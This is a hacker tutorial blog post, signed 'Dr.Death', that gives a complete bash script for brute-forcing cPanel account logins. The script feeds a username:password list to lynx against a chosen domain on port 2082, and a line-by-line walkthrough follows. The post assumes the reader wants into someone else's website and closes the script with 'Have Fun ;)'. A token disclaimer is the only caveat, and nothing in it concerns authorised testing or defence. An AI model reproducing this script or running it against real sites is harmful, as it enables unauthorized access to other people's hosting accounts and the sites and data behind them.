how to build your own BruteForce tool using linux shell script

Hello, did you ever try to brute force a website login page and you didn't find the right tool?
it always happen, so i will explain how i did it with linux shell script.

I wrote a small script to brute force Cpanel accounts:
============================================
#!/usr/bin/env bash
# Cpanel BruteForce v1.0
# Coded By Dr.Death 2008
# drdeath[at]bsdmail.org
#
# This is a simple script that will brute force Cpanel account
#
# I do not take any reponsibilty for what you do with this tool
# Hopefully it will make your life easier rather then making other
# peoples lives more difficult!
#############################

#  _____       _____             _   _
# |  __ \     |  __ \           | | | |
# | |  | |_ __| |  | | ___  __ _| |_| |__
# | |  | | '__| |  | |/ _ \/ _` | __| '_ \
# | |__| | | _| |__| |  __/ (_| | |_| | | |
# |_____/|_|(_)_____/ \___|\__,_|\__|_| |_|

#############################

echo ".::Cpanel BruteForcer By Dr.Death::."
echo
echo -n "Enter domain name for the Cpanel account you want bruteforce:
> "
read site

n=`cat pass_list | wc -l`
for (( i=1; i <= $n; i++));
do

password=`sed -n "$i"p pass_list`

b=`lynx -dump -nolist -auth="$password" ""$site":2082"`

echo trying password $password

if [ ! -z "$b" ]; then

echo "Bengo WebSite "$site" password is: "$password""
echo "Have Fun ;)"
exit 0
fi
done
echo
echo "brute force complete"
echo "no luck, try better dictionary"
exit
==========================================

lets explain what we did:

• #!/usr/bin/env bash

to execute the script using bash shell from the environment "env".

• read site

set the user input as variable "$site" which will be the website domain name.

• n=`cat pass_list | wc -l`

this will print how many lines in file "pass_list" which include passwords list.

• for (( i=1; i <= $n; i++));

we put the number we got for the variable "$n" in a for loop, so for example if file pass_list have 1000 password on it we will do the for loop 1000 time, to try all the passwords.

• password=`sed -n "$i"p pass_list`

here we use "sed" the steam editor with option "p" to print all the passwords in the pass_list in each loop.
for example in loop number 4 variable $i will have value of 4 and the sed comand will be like this:
"sed -n 4p pass_list" which will print the 4th line from the password file pass_list.

• b=`lynx -dump -nolist -auth="$password" ""$site":2082"`

here we use "lynx" the linux command line browser as a socket to connect to the target website.
we use option "-dump" to dump the output instead of waiting user action, "-nolist" to disable the link list feature in dumps, "-auth=" use to set authorization ID and password for protected documents.
for example to access cpanel account for website "example.com" with username "user" and password "pass" it will be like this:
"lynx -dump -nolist -auth=user:pass http://www.example.com:2082"

so password file pass_list should include the usernames and passwords in this format: "username:password"

• if [ ! -z "$b" ]; then

here we use if statment with option "! -z" which mean if value of "$b" is not equal to Zero we are logged in and the password is the value of the variable "$password" in the loop we are in and exit successfuly, else continue the loop.

Thats all falks :)
Dr.Death